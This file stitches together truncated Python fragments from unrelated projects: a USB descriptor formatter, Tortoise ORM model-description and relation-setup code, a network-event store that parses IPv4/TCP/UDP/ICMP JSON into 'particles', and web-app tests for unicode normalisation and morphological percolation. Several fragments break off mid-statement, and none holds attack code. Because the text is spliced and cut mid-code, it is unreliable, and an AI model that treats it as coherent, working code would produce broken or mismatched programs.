_try_lookup(_lu.descriptors, self.bDescriptorType)) + \
" %-17s:%#7x %s\n" % (
"bEndpointAddress", self.bEndpointAddress, direction) + \
" %-17s:%#7x %s\n" % (
"bmAttributes", self.bmAttributes,
_lu.ep_attributes[(self.bmAttributes & 0x3)]) + \
" %-17s:%#7x (%d bytes)\n" % (
"wMaxPacketSize", self.wMaxPacketSize, self.wMaxPacketSize) + \
" %-17s:%#7x" % ("bInterval", self.bInterval)
def write(self, data, timeout = None):
r"""Write data to the endpoint.
The parameter data contains the | |
import asyncio
import importlib
import json
import logging
import os
import warnings
from copy import deepcopy
from inspect import isclass
from typing import Any, Coroutine, Dict, List, Optional, Tuple, Type, Union, cast
from pypika import Table
from tortoise.backends.base.client import BaseDBAsyncClient
from tortoise.backends.base.config_generator import expand_db_url, generate_config
from tortoise.exceptions import ConfigurationError
from tortoise.fields.relational import (
BackwardFKRelation,
BackwardOneToOneRelation,
ForeignKeyFieldInstance,
ManyToManyFieldInstance,
OneToOneFieldInstance,
)
from tortoise.filters import get_m2m_filters
from tortoise.models import Model
from tortoise.queryset import QuerySet
from tortoise.transactions import current_transaction_map
from tortoise.utils import generate_schema_for_client
try:
from contextvars import ContextVar
except ImportError: # pragma: nocoverage
from aiocontextvars import ContextVar # type: ignore
logger = logging.getLogger("tortoise")
class Tortoise:
apps: Dict[str, Dict[str, Type[Model]]] = {}
_connections: Dict[str, BaseDBAsyncClient] = {}
_inited: bool = False
@classmethod
def get_connection(cls, connection_name: str) -> BaseDBAsyncClient:
"""
Returns the connection by name.
:raises KeyError: If connection name does not exist.
"""
return cls._connections[connection_name]
@classmethod
def describe_model(cls, model: Type[Model], serializable: bool = True) -> dict:
"""
Describes the given model.
:param model:
The Model to describe
:param serializable:
``False`` if you want raw python objects,
``True`` for JSON-serialisable data. (Defaults to ``True``)
:return:
A dictionary containing the model description.
The base dict has a fixed set of keys that reference a list of fields
(or a single field in the case of the primary key):
.. code-block:: python3
{
"name": str # Qualified model name
"app": str # 'App' namespace
"table": str # DB table name
"abstract": bool # Is the model Abstract?
"description": str # Description of table (nullable)
"unique_together": [...] # List of List containing field names that
# are unique together
"pk_field": {...} # Primary key field
"data_fields": [...] # Data fields
"fk_fields": [...] # Foreign Key fields FROM this model
"backward_fk_fields": [...] # Foreign Key fields TO this model
"o2o_fields": [...] # OneToOne fields FROM this model
"backward_o2o_fields": [...] # OneToOne fields TO this model
"m2m_fields": [...] # Many-to-Many fields
}
Each field is specified as follows
(This assumes ``serializable=True``, which is the default):
.. code-block:: python3
{
"name": str # Field name
"field_type": str # Field type
"db_column": str # Name of DB column
# Optional: Only for pk/data fields
"raw_field": str # Name of raw field of the Foreign Key
# Optional: Only for Foreign Keys
"db_field_types": dict # DB Field types for default and DB overrides
"python_type": str # Python type
"generated": bool # Is the field generated by the DB?
"nullable": bool # Is the column nullable?
"unique": bool # Is the field unique?
"indexed": bool # Is the field indexed?
"default": ... # The default value (coerced to int/float/str/bool/null)
"description": str # Description of the field (nullable)
}
When ``serializable=False`` is specified some fields are not coerced to valid
JSON types. The changes are:
.. code-block:: python3
{
"field_type": Field # The Field class used
"python_type": Type # The actual Python type
"default": ... # The default value as native type OR a callable
}
"""
def _type_name(typ) -> str:
if typ.__module__ == "builtins":
return typ.__name__
return f"{typ.__module__}.{typ.__name__}"
def model_name(typ: Type[Model]) -> str:
name = typ._meta.table
for app in cls.apps.values(): # pragma: nobranch
for _name, _model in app.items(): # pragma: nobranch
if typ == _model:
name = _name
return f"{typ._meta.app}.{name}"
def type_name(typ: Any) -> Union[str, List[str]]:
try:
if issubclass(typ, Model):
return model_name(typ)
except TypeError:
pass
try:
return _type_name(typ)
except AttributeError:
return [_type_name(_typ) for _typ in typ]
def default_name(default: Any) -> Optional[Union[int, float, str, bool]]:
if isinstance(default, (int, float, str, bool, type(None))):
return default
if callable(default):
return f"<function {default.__module__}.{default.__name__}>"
return str(default)
def describe_field(name: str) -> dict:
# TODO: db_type
field = model._meta.fields_map[name]
field_type = getattr(field, "model_class", field.field_type)
desc = {
"name": name,
"field_type": field.__class__.__name__ if serializable else field.__class__,
"db_column": field.source_field or name,
"raw_field": None,
"db_field_types": field.get_db_field_types(),
"python_type": type_name(field_type) if serializable else field_type,
"generated": field.generated,
"nullable": field.null,
"unique": field.unique,
"indexed": field.index or field.unique,
"default": default_name(field.default) if serializable else field.default,
"description": field.description,
}
# Delete db fields for non-db fields
if not desc["db_field_types"]:
del desc["db_field_types"]
# Foreign Keys have no column of their own; they expose the raw "<field>_id" source field instead
if isinstance(field, (ForeignKeyFieldInstance, OneToOneFieldInstance)):
del desc["db_column"]
desc["raw_field"] = field.source_field
else:
del desc["raw_field"]
# These fields are entirely "virtual", so no direct DB representation
if isinstance(
field, (ManyToManyFieldInstance, BackwardFKRelation, BackwardOneToOneRelation,),
):
del desc["db_column"]
return desc
return {
"name": model_name(model),
"app": model._meta.app,
"table": model._meta.table,
"abstract": model._meta.abstract,
"description": model._meta.table_description or None,
"unique_together": model._meta.unique_together or [],
"pk_field": describe_field(model._meta.pk_attr),
"data_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name != model._meta.pk_attr
and name in (model._meta.fields - model._meta.fetch_fields)
],
"fk_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.fk_fields
],
"backward_fk_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.backward_fk_fields
],
"o2o_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.o2o_fields
],
"backward_o2o_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.backward_o2o_fields
],
"m2m_fields": [
describe_field(name)
for name in model._meta.fields_map.keys()
if name in model._meta.m2m_fields
],
}
@classmethod
def describe_models(
cls, models: Optional[List[Type[Model]]] = None, serializable: bool = True
) -> Dict[str, dict]:
"""
Describes the given list of models or ALL registered models.
:param models:
List of models to describe, if not provided then describes ALL registered models
:param serializable:
``False`` if you want raw python objects,
``True`` for JSON-serialisable data. (Defaults to ``True``)
:return:
A dictionary containing the model qualifier as key,
and the same output as ``describe_model(...)`` as value:
.. code-block:: python3
{
"models.User": {...},
"models.Permission": {...}
}
"""
if not models:
models = []
for app in cls.apps.values():
for model in app.values():
models.append(model)
return {
f"{model._meta.app}.{model.__name__}": cls.describe_model(model, serializable)
for model in models
}
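# Hedged usage sketch (the model and app names are placeholders): once the apps
# are registered, a call such as
#   Tortoise.describe_models([User], serializable=True)
# returns {"models.User": {...}} with each value shaped as in describe_model().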
@classmethod
def _init_relations(cls) -> None:
def get_related_model(related_app_name: str, related_model_name: str):
"""
Test if app and model really exist. Throws a ConfigurationError with a hopefully
helpful message. If successful, returns the requested model.
"""
try:
return cls.apps[related_app_name][related_model_name]
except KeyError:
if related_app_name not in cls.apps:
raise ConfigurationError(f"No app with name '{related_app_name}' registered.")
raise ConfigurationError(
f"No model with name '{related_model_name}' registered in"
f" app '{related_app_name}'."
)
def split_reference(reference: str) -> Tuple[str, str]:
"""
Test if the reference follows the official naming conventions. Throws a
ConfigurationError with a hopefully helpful message. If successful,
returns the app and the model name.
"""
items = reference.split(".")
if len(items) != 2: # pragma: nocoverage
raise ConfigurationError(
(
"'%s' is not a valid model reference Bad Reference."
" Should be something like <appname>.<modelname>."
)
% reference
)
return (items[0], items[1])
for app_name, app in cls.apps.items():
for model_name, model in app.items():
if model._meta._inited:
continue
model._meta._inited = True
if not model._meta.table:
model._meta.table = model.__name__.lower()
pk_attr_changed = False
for field in model._meta.fk_fields:
fk_object = cast(ForeignKeyFieldInstance, model._meta.fields_map[field])
reference = fk_object.model_name
related_app_name, related_model_name = split_reference(reference)
related_model = get_related_model(related_app_name, related_model_name)
key_field = f"{field}_id"
key_fk_object = deepcopy(related_model._meta.pk)
key_fk_object.pk = False
key_fk_object.unique = False
key_fk_object.index = fk_object.index
key_fk_object.default = fk_object.default
key_fk_object.null = fk_object.null
key_fk_object.generated = fk_object.generated
key_fk_object.reference = fk_object
key_fk_object.description = fk_object.description
if fk_object.source_field:
key_fk_object.source_field = fk_object.source_field
fk_object.source_field = key_field
else:
fk_object.source_field = key_field
key_fk_object.source_field = key_field
model._meta.add_field(key_field, key_fk_object)
fk_object.model_class = related_model
backward_relation_name = fk_object.related_name
if backward_relation_name is not False:
if not backward_relation_name:
backward_relation_name = f"{model._meta.table}s"
if backward_relation_name in related_model._meta.fields:
raise ConfigurationError(
f'backward relation "{backward_relation_name}" duplicates in'
f" model {related_model_name}"
)
fk_relation = BackwardFKRelation(
model, f"{field}_id", fk_object.null, fk_object.description
)
related_model._meta.add_field(backward_relation_name, fk_relation)
for field in model._meta.o2o_fields:
o2o_object = cast(OneToOneFieldInstance, model._meta.fields_map[field])
reference = o2o_object.model_name
related_app_name, related_model_name = split_reference(reference)
related_model = get_related_model(related_app_name, related_model_name)
key_field = f"{field}_id"
key_o2o_object = deepcopy(related_model._meta.pk)
key_o2o_object.pk = o2o_object.pk
key_o2o_object.index = o2o_object.index
key_o2o_object.default = o2o_object.default
key_o2o_object.null = o2o_object.null
key_o2o_object.unique = o2o_object.unique
key_o2o_object.generated = o2o_object.generated
key_o2o_object.reference = o2o_object
key_o2o_object.description = o2o_object.description
if o2o_object.source_field:
key_o2o_object.source_field = o2o_object.source_field
o2o_object.source_field = key_field
else:
o2o_object.source_field = key_field
key_o2o_object.source_field = key_field
model._meta.add_field(key_field, key_o2o_object)
o2o_object.model_class = related_model
backward_relation_name = o2o_object.related_name
if backward_relation_name is not False:
if not backward_relation_name:
backward_relation_name = f"{model._meta.table}"
if backward_relation_name in related_model._meta.fields:
raise ConfigurationError(
f'backward relation "{backward_relation_name}" duplicates in'
f" model {related_model_name}"
)
o2o_relation = BackwardOneToOneRelation(
model, f"{field}_id", null=True, description=o2o_object.description
)
related_model._meta.add_field(backward_relation_name, o2o_relation)
if o2o_object.pk:
pk_attr_changed = True
model._meta.pk_attr = key_field
for field in list(model._meta.m2m_fields):
m2m_object = cast(ManyToManyFieldInstance, model._meta.fields_map[field])
if m2m_object._generated:
continue
backward_key = m2m_object.backward_key
if not backward_key:
backward_key = f"{model._meta.table}_id"
if backward_key == | |
particleID)
#
# -> This is the vectorSpaceGetAllSTIXParticle function that implements the get
# all STIX/Prediction particles that are in the vector space functionality.
#
def vectorSpaceGetAllSTIXParticle(self):
return self._vectorSpace.getAllSTIXParticles()
#
# -> This is the vectorSpaceGetAllEventParticle function that implements the get
# all event types particles that are in the vector space functionality.
#
def vectorSpaceGetAllEventParticle(self):
return self._vectorSpace.getAllEventParticles()
#
# -> This is the vectorSpaceGetParticleXYZ function that implements the get
# particle list at location x,y,z in the vector space functionality.
#
def vectorSpaceGetParticleXYZ(self, x, y, z):
return self._vectorSpace.getParticleList(x, y, z)
#
# -> This is the vectorSpaceAddParticleList function that implements the add particle to the
# vector space functionality.
#
def vectorSpaceAddParticleList(self, x, y, z, particle):
return self._vectorSpace.addParticleList(x, y, z, particle)
#
# -> This is the vectorSpaceDelParticleList function that implements the delete particle from the
# vector space functionality.
#
def vectorSpaceDelParticleList(self, particle):
return self._vectorSpace.delParticleList(particle)
#
# -> This is the DBInsert function that implements the low-level insert particle into database functionality.
#
def DBInsert(self, particletype, digest, partcile):
self._cacheDB[particletype][digest] = partcile
#self._graph.addV(particletype).property('particle',partcile)
#
# -> This is the setSubParticle function that implements the set particle sub-type functionality.
#
def setSubParticle(self, particle_type, digest, sub_particle_id, sub_particle_type):
self._cacheDB[particle_type][digest].setSubType(sub_particle_type)
self._cacheDB[particle_type][digest].setSubTypeID(sub_particle_id)
return True
#
# -> This is the setSuperParticle function that implements the set particle super-type functionality.
#
def setSuperParticle(self, particle_type, digest, super_particle_id, super_particle_type):
self._cacheDB[particle_type][digest].setSuperType(super_particle_type)
self._cacheDB[particle_type][digest].setSuperTypeID(super_particle_id)
return True
#
# -> This is the insertEvent function that implements the insert event into database functionality.
#
def insertEvent(self, jdata, digest):
datetime = jdata['event']['_datetime']
sub_type = jdata['event']['_type']
eventParticle = EventParticle('event', digest, datetime, sub_type, jdata['event'])
xVector = random.randrange(-10, 10)
yVector = random.randrange(-10, 10)
zVector = random.randrange(-10, 10)
forceVector = random.randrange(0, 50)
eventParticle.setForce((xVector, yVector, zVector, forceVector))
self.DBInsert('event', digest, eventParticle)
return digest
#
#
#
# -> IPV4 JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 13 15:4:21", "_ident" : "17464748191557756261", "_type" : "ipv4",
# "ipv4": { "_datetime" : " May 13 15:4:21", "_ident" : "11957957371557756261", "_type" : "ipv4",
# "version" : "4", "ihl" : "5", "tos" : "0", "tlen" : "10240", "ident" : "0", "fragoff" : "64",
# "ttl" : "64", "protocol" : "6", "hcs" : "49329", "sourceip" : "192.168.1.100",
# "destinationip" : "172.16.31.10" } } }
#
def insertIPv4(self, jdata, digest):
datetime = jdata['ipv4']['_datetime']
version = jdata['ipv4']['version']
ihl = jdata['ipv4']['ihl']
tos = jdata['ipv4']['tos']
tlen = jdata['ipv4']['tlen']
ident = jdata['ipv4']['ident']
fragoff = jdata['ipv4']['fragoff']
ttl = jdata['ipv4']['ttl']
protocol = jdata['ipv4']['protocol']
hcs = jdata['ipv4']['hcs']
sourceip = jdata['ipv4']['sourceip']
destinationip = jdata['ipv4']['destinationip']
identifn = hashlib.sha224(str(digest+str(random.random())).encode('utf-8')).hexdigest()
#
self.DBInsert('ipv4', digest, IPV4Particle('ipv4', identifn, datetime, version, ihl, tos, tlen, ident,
fragoff, ttl, protocol, hcs, sourceip, destinationip))
#
self._vectorSpace.addParticleList(0,0,0,('ipv4', digest ))
#
if (DEBUG):
print('Identifier :-> IPV4/', digest)
print('Datatime :->', datetime)
print('IP Version :->', version)
print('Inet Header Len:->', ihl)
print('Type of Service:->', tos)
print('Total Length :->', tlen)
print('Ident :->', ident)
print('Frag Off Set :->', fragoff)
print('Time to Live :->', ttl)
print('Protocol :->', protocol)
print('Header CheckSum:->', hcs)
print('Source IP Addr :->', sourceip)
print('Dest IP Addr :->', destinationip)
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> TCP JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 13 17:0:31", "_ident" : "16117398161557763231", "_type" : "ipv4",
# "ipv4": { "_datetime" : " May 13 17:0:31", "_ident" : "1523642541557763231", "_type" : "tcp",
# "version" : "4", "ihl" : "5", "tos" : "0", "tlen" : "16384", "ident" : "0", "fragoff" : "64",
# "ttl" : "255", "protocol" : "6", "hcs" : "39849", "sourceip" : "192.168.1.100",
# "destinationip" : "8.8.8.8", "tcp": { "_datetime" : " 13 17:0:31", "_ident" : "9855097541557763231",
# "_type" : "tcp", "sourport" : "46798", "destport" : "10146", "sequnum" : "3954678030",
# "acknum" : "0", "winsize" : "65535", "checksum" : "25923", "urgptr" : "0", "dataoffset" : "11",
# "ackflag" : "0", "cwrflag" : "0", "synflag" : "1", "pushflag" : "0", "ecnflag" : "0", "finflag" : "0",
# "rstflag" : "0", "urgflag" : "0" } } } }
#
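    # Note: judging from the field accesses below, this method expects jdata to already be the
    # inner "tcp" dictionary (i.e. the caller has unwrapped event -> ipv4 -> tcp), unlike
    # insertIPv4 above, which receives the dictionary that still contains the "ipv4" key.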
def insertIPTCP(self, jdata, digest):
datetime = jdata['_datetime']
sourport = jdata['sourport']
destport = jdata['destport']
sequnum = jdata['sequnum']
acknum = jdata['acknum']
winsize = jdata['winsize']
checksum = jdata['checksum']
urgptr = jdata['urgptr']
dataoffset = jdata['dataoffset']
ackflag = jdata['ackflag']
cwrflag = jdata['cwrflag']
synflag = jdata['synflag']
pushflag = jdata['pushflag']
ecnflag= jdata['ecnflag']
finflag = jdata['finflag']
rstflag = jdata['rstflag']
urgflag = jdata['urgflag']
#
self.DBInsert('tcp', digest, TCPParticle('tcp', digest, datetime, sourport, destport, sequnum,
acknum, winsize, checksum, urgptr, dataoffset, ackflag,
cwrflag, synflag, pushflag, ecnflag, finflag, rstflag, urgflag))
#
self._vectorSpace.addParticleList(0,0,0,('tcp', digest ))
#
if (DEBUG):
print('Identifier :-> TCP/', digest)
print('Datatime :->', datetime)
print('Source Port :->', sourport)
print('Dest Port :->', destport)
print('Sequence Number:->', sequnum)
print('Ack Number :->', acknum)
print('Windows Size :->', winsize)
print('Check Sum :->', checksum)
print('Data Off Set :->', dataoffset)
print('Urgent Pointer :->', urgptr)
print('TCP Flags:')
print(' :-> [SYN:', synflag,']/[ACK:', ackflag, ']/[PSH:', pushflag, ']/[FIN:', finflag,']')
print(' :-> [URG:', urgflag,']/[CWR:', cwrflag, ']/[ECN:', ecnflag, ']/[RST:', rstflag,']')
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> UDP JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 14 9:53:9", "_ident" : "7845588211557823989", "_type" :
# "ipv4", "ipv4": { "_datetime" : " 14 9:53:9", "_ident" : "5305119671557823989", "_type" : "udp",
# "version" : "4", "ihl" : "5", "tos" : "0", "tlen" : "61952", "ident" : "0", "fragoff" : "64",
# "ttl" : "64", "protocol" : "17", "hcs" : "17846", "sourceip" : "192.168.1.1",
# "destinationip" : "192.168.1.100", "udp": { "_datetime" : " 14 9:53:9", "_ident" : "21100106721557823989",
# "_type" : "udp", "checksum" : "38972", "length" : "56832", "sourport" : "13568",
# "destport" : "15855" } } } }
#
def insertIPUDP(self, jdata, digest):
datetime = jdata['_datetime']
sourport = jdata['sourport']
destport = jdata['destport']
checksum = jdata['checksum']
length = jdata['length']
#
self.DBInsert('udp', digest, UDPParticle('udp', digest, datetime, checksum, length, sourport, destport))
#
self._vectorSpace.addParticleList(0,0,0,('udp', digest ))
#
if (DEBUG):
            print('Identifier :-> UDP/', digest)
print('Datatime :->', datetime)
print('Source Port :->', sourport)
print('Dest Port :->', destport)
print('Packet Checksum:->', checksum)
print('Packet Length :->', length)
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> ICMP JSON Event Data Structure is as follows:
# { "event" : { "_datetime" : "May 13 9:25:7", "_ident" : "9849436581557735907", "_type" : "ipv4",
# "ipv4": { "_datetime" : " 13 9:25:7", "_ident" : "11441089301557735907", "_type" : "icmp",
# "version" : "4", "ihl" : "5", "tos" : "72", "tlen" : "21504", "ident" : "58470", "fragoff" : "0",
# "ttl" : "121", "protocol" : "1", "hcs" : "24840", "sourceip" : "8.8.8.8",
# "destinationip" : "192.168.1.100", "icmp": { "_datetime" : " 13 9:25:7",
# "_ident" : "4702112721557735907", "_type" : "icmp", "type" : "0", "code" : "0",
# "checksum" : "1308" } } } }
#
def insertIPICMP(self, jdata, digest):
datetime = jdata['_datetime']
ptype = jdata['type']
code = jdata['code']
checksum = jdata['checksum']
#
self.DBInsert('icmp', digest, ICMPParticle('icmp', digest, datetime, ptype, code, checksum))
#
self._vectorSpace.addParticleList(0,0,0,('icmp', digest ))
#
if (DEBUG):
print('Identifier :-> ICMP/', digest)
print('Datatime :->', datetime)
print('ICMP Type :->', ptype)
print('ICMP code :->', code)
print('ICMP Checksum :->', checksum)
print('@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@')
#
return digest
#
# -> TCP/IP HTTP JSON Event Data Structure is as follows:
# { "event": { "_datetime": "May14 10:46:59", "_ident": "20919625371557827219", "_type": "ipv4",
# "ipv4": { "_datetime": " May 14 10:46:59", "_ident": "10120906751557827219", "_type": "tcp",
# "version": "4", "ihl": "5", "tos": "0", "tlen": "16384", "ident": "0", "fragoff": "64",
# "ttl": "255", "protocol": "6", "hcs": "39849", "sourceip": "192.168.1.100",
# "destinationip": "8.8.8.8", "tcp": { "_datetime": " May 14 10:46:59", "_ident": "21374904851557827219",
# "_type": "http", "sourport": "33518", "destport": "772", "sequnum": "1904020587", "acknum": "0",
# "winsize": "65535", "checksum": "52753", "urgptr": "0","dataoffset": "11", "ackflag": "0", "cwrflag": "0",
# "synflag": "1", "pushflag": "0", "ecnflag": "0", "finflag": "0", "rstflag": "0", "urgflag": | |
resp['tags']]
# Try to get the restricted tag as the viewer and expect to fail
extra_environ = {'test.authentication.id': contributor_id,
'test.application_settings': True}
response = self.app.get(url('form', id=restricted_form_id), headers=self.json_headers,
extra_environ=extra_environ, status=403)
resp = json.loads(response.body)
assert resp['error'] == u'You are not authorized to access this resource.'
@nottest
def test_normalization(self):
"""Tests that unicode input data are normalized and so too are search patterns."""
e_acute_combining = u'e\u0301' # LATIN SMALL LETTER E, COMBINING ACUTE ACCENT
e_acute_precomposed = u'\u00E9' # LATIN SMALL LETTER E WITH ACUTE
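        # The two spellings are canonically equivalent: unicodedata.normalize('NFD', u'\u00E9')
        # yields u'e\u0301', and NFC composes u'e\u0301' back to u'\u00E9'. Per the comment on the
        # assertion further down, h.normalize is expected to map both inputs to a single form.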
# Create a form with a unicode combining character in its transcription
params = self.form_create_params.copy()
params.update({
'transcription': e_acute_combining,
'translations': [{'transcription': u'test normalization', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
combining_form_id = resp['id']
combining_transcription = resp['transcription']
# Create a form with a unicode precomposed character in its transcription
params = self.form_create_params.copy()
params.update({
'transcription': e_acute_precomposed,
'translations': [{'transcription': u'test normalization', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, self.extra_environ_admin)
resp = json.loads(response.body)
precomposed_form_id = resp['id']
precomposed_transcription = resp['transcription']
assert combining_transcription == precomposed_transcription # h.normalize converts these both to u'e\u0301'
# Now search for the precomposed character and expect to find two matches
json_query = json.dumps(
{'query': {'filter': ['Form', 'transcription', 'like', u'%\u00E9%']}})
response = self.app.request(url('forms'), method='SEARCH',
body=json_query, headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == 2
assert sorted([f['id'] for f in resp]) == sorted([combining_form_id, precomposed_form_id])
        # Search for the e + combining acute and expect to find the same two matches
json_query = json.dumps(
{'query': {'filter': ['Form', 'transcription', 'like', u'%e\u0301%']}})
response = self.app.request(url('forms'), method='SEARCH',
body=json_query, headers=self.json_headers, environ=self.extra_environ_admin)
resp = json.loads(response.body)
assert len(resp) == 2
assert sorted([f['id'] for f in resp]) == sorted([combining_form_id, precomposed_form_id])
@nottest
def test_lexical_percolation(self):
"""Tests that creation, updating and deletion of a lexical forms percolates up to the phrasal forms containing them.
"""
# First create a couple of syntactic categories and the application settings
Agr = model.SyntacticCategory()
Agr.name = u'Agr'
N = h.generate_n_syntactic_category()
Num = h.generate_num_syntactic_category()
application_settings = h.generate_default_application_settings()
Session.add_all([N, Num, application_settings, Agr])
Session.commit()
NId = N.id
NumId = Num.id
AgrId = Agr.id
extra_environ = {'test.authentication.role': u'administrator',
'test.application_settings': True}
# Create two forms with morphological analyses.
params = self.form_create_params.copy()
params.update({
'transcription': u'abc',
'morpheme_break': u'a-b-c',
'morpheme_gloss': u'1-2-3',
'translations': [{'transcription': u'123', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, extra_environ)
params = self.form_create_params.copy()
params.update({
'transcription': u'xyz',
'morpheme_break': u'x-y-z',
'morpheme_gloss': u'7-8-9',
'translations': [{'transcription': u'789', 'grammaticality': u''}]
})
params = json.dumps(params)
response = self.app.post(url('forms'), params, self.json_headers, extra_environ)
xyz_id = json.loads(response.body)['id']
# GET the forms and confirm that the morpheme_break_ids values are "empty"
response = self.app.get(url('forms'), headers=self.json_headers,
extra_environ=self.extra_environ_admin)
resp = json.loads(response.body)
phrasal_ids = [f['id'] for f in resp]
assert len(resp) == 2
assert [f['morpheme_break_ids'] for f in resp] == [[[[], [], []]], [[[], [], []]]]
assert [f['morpheme_gloss_ids'] for f in resp] == [[[[], [], []]], [[[], [], []]]]
assert [f['syntactic_category_string'] for f in resp] == [u'?-?-?', u'?-?-?']
# Now add the implicit lexical items for the two forms just entered and
# expect the morpheme_break_ids (etc.) fields of the two phrasal forms to
# have changed.
sleep(1)
x_params = self.form_create_params.copy()
x_params.update({
'transcription': u'x',
'morpheme_break': u'x',
'morpheme_gloss': u'7',
'translations': [{'transcription': u'7', 'grammaticality': u''}],
'syntactic_category': NumId
})
x_params = json.dumps(x_params)
response = self.app.post(url('forms'), x_params, self.json_headers, extra_environ)
x_resp = json.loads(response.body)
x_id = x_resp['id']
assert x_resp['morpheme_break_ids'][0][0][0][1] == u'7'
assert x_resp['morpheme_break_ids'][0][0][0][2] == u'Num'
assert x_resp['morpheme_gloss_ids'][0][0][0][1] == u'x'
assert x_resp['morpheme_gloss_ids'][0][0][0][2] == u'Num'
assert x_resp['syntactic_category_string'] == u'Num'
assert x_resp['break_gloss_category'] == u'x|7|Num'
y_params = self.form_create_params.copy()
y_params.update({
'transcription': u'y',
'morpheme_break': u'y',
'morpheme_gloss': u'8',
'translations': [{'transcription': u'8', 'grammaticality': u''}],
'syntactic_category': NId
})
y_params = json.dumps(y_params)
response = self.app.post(url('forms'), y_params, self.json_headers, extra_environ)
y_id = json.loads(response.body)['id']
z_params = self.form_create_params.copy()
z_params.update({
'transcription': u'z',
'morpheme_break': u'z',
'morpheme_gloss': u'9',
'translations': [{'transcription': u'9', 'grammaticality': u''}],
'syntactic_category': NumId
})
z_params = json.dumps(z_params)
response = self.app.post(url('forms'), z_params, self.json_headers, extra_environ)
z_id = json.loads(response.body)['id']
a_params = self.form_create_params.copy()
a_params.update({
'transcription': u'a',
'morpheme_break': u'a',
'morpheme_gloss': u'1',
'translations': [{'transcription': u'1', 'grammaticality': u''}],
'syntactic_category': NumId
})
a_params = json.dumps(a_params)
response = self.app.post(url('forms'), a_params, self.json_headers, extra_environ)
b_params = self.form_create_params.copy()
b_params.update({
'transcription': u'b',
'morpheme_break': u'b',
'morpheme_gloss': u'2',
'translations': [{'transcription': u'2', 'grammaticality': u''}],
'syntactic_category': NId
})
b_params = json.dumps(b_params)
response = self.app.post(url('forms'), b_params, self.json_headers, extra_environ)
c_params = self.form_create_params.copy()
c_params.update({
'transcription': u'c',
'morpheme_break': u'c',
'morpheme_gloss': u'3',
'translations': [{'transcription': u'3', 'grammaticality': u''}],
'syntactic_category': NumId
})
c_params = json.dumps(c_params)
response = self.app.post(url('forms'), c_params, self.json_headers, extra_environ)
# Use search to get our two original morphologically complex forms
json_query = json.dumps({'query': {'filter':
['Form', 'id', 'in', phrasal_ids]}})
response = self.app.post(url('/forms/search'), json_query,
self.json_headers, self.extra_environ_admin)
resp2 = json.loads(response.body)
assert [f['id'] for f in resp] == [f['id'] for f in resp2]
assert [f['datetime_modified'] for f in resp2] != [f['datetime_modified'] for f in resp]
assert resp2[0]['morpheme_break_ids'][0][0][0][1] == u'1'
assert resp2[0]['morpheme_break_ids'][0][0][0][2] == u'Num'
assert resp2[0]['morpheme_break_ids'][0][1][0][1] == u'2'
assert resp2[0]['morpheme_break_ids'][0][1][0][2] == u'N'
assert resp2[0]['morpheme_break_ids'][0][2][0][1] == u'3'
assert resp2[0]['morpheme_break_ids'][0][2][0][2] == u'Num'
assert resp2[0]['morpheme_gloss_ids'][0][0][0][1] == u'a'
assert resp2[0]['morpheme_gloss_ids'][0][0][0][2] == u'Num'
assert resp2[0]['morpheme_gloss_ids'][0][1][0][1] == u'b'
assert resp2[0]['morpheme_gloss_ids'][0][1][0][2] == u'N'
assert resp2[0]['morpheme_gloss_ids'][0][2][0][1] == u'c'
assert resp2[0]['morpheme_gloss_ids'][0][2][0][2] == u'Num'
assert resp2[0]['syntactic_category_string'] == u'Num-N-Num'
assert resp2[0]['break_gloss_category'] == u'a|1|Num-b|2|N-c|3|Num'
assert resp2[1]['morpheme_break_ids'][0][0][0][1] == u'7'
assert resp2[1]['morpheme_break_ids'][0][0][0][2] == u'Num'
assert resp2[1]['morpheme_break_ids'][0][1][0][1] == u'8'
assert resp2[1]['morpheme_break_ids'][0][1][0][2] == u'N'
assert resp2[1]['morpheme_break_ids'][0][2][0][1] == u'9'
assert resp2[1]['morpheme_break_ids'][0][2][0][2] == u'Num'
assert resp2[1]['morpheme_gloss_ids'][0][0][0][1] == u'x'
assert resp2[1]['morpheme_gloss_ids'][0][0][0][2] == u'Num'
assert resp2[1]['morpheme_gloss_ids'][0][1][0][1] == u'y'
assert resp2[1]['morpheme_gloss_ids'][0][1][0][2] == u'N'
assert resp2[1]['morpheme_gloss_ids'][0][2][0][1] == u'z'
assert resp2[1]['morpheme_gloss_ids'][0][2][0][2] == u'Num'
assert resp2[1]['syntactic_category_string'] == u'Num-N-Num'
assert resp2[1]['break_gloss_category'] == u'x|7|Num-y|8|N-z|9|Num'
form_backups = Session.query(model.FormBackup).all()
assert len(form_backups) == 6 # each lexical item creation updates one phrasal form
# Now update the lexical items and expect updates in the phrasal ones too
# Update the morpheme_break value of the lexical form 'x' and expect the
# phrasal form 'xyz' to get updated too.
form_backup_count = Session.query(model.FormBackup).count()
x_params = json.loads(x_params)
x_params['morpheme_break'] = u'xx'
x_params = json.dumps(x_params)
response = self.app.put(url('form', id=x_id), x_params, self.json_headers, extra_environ)
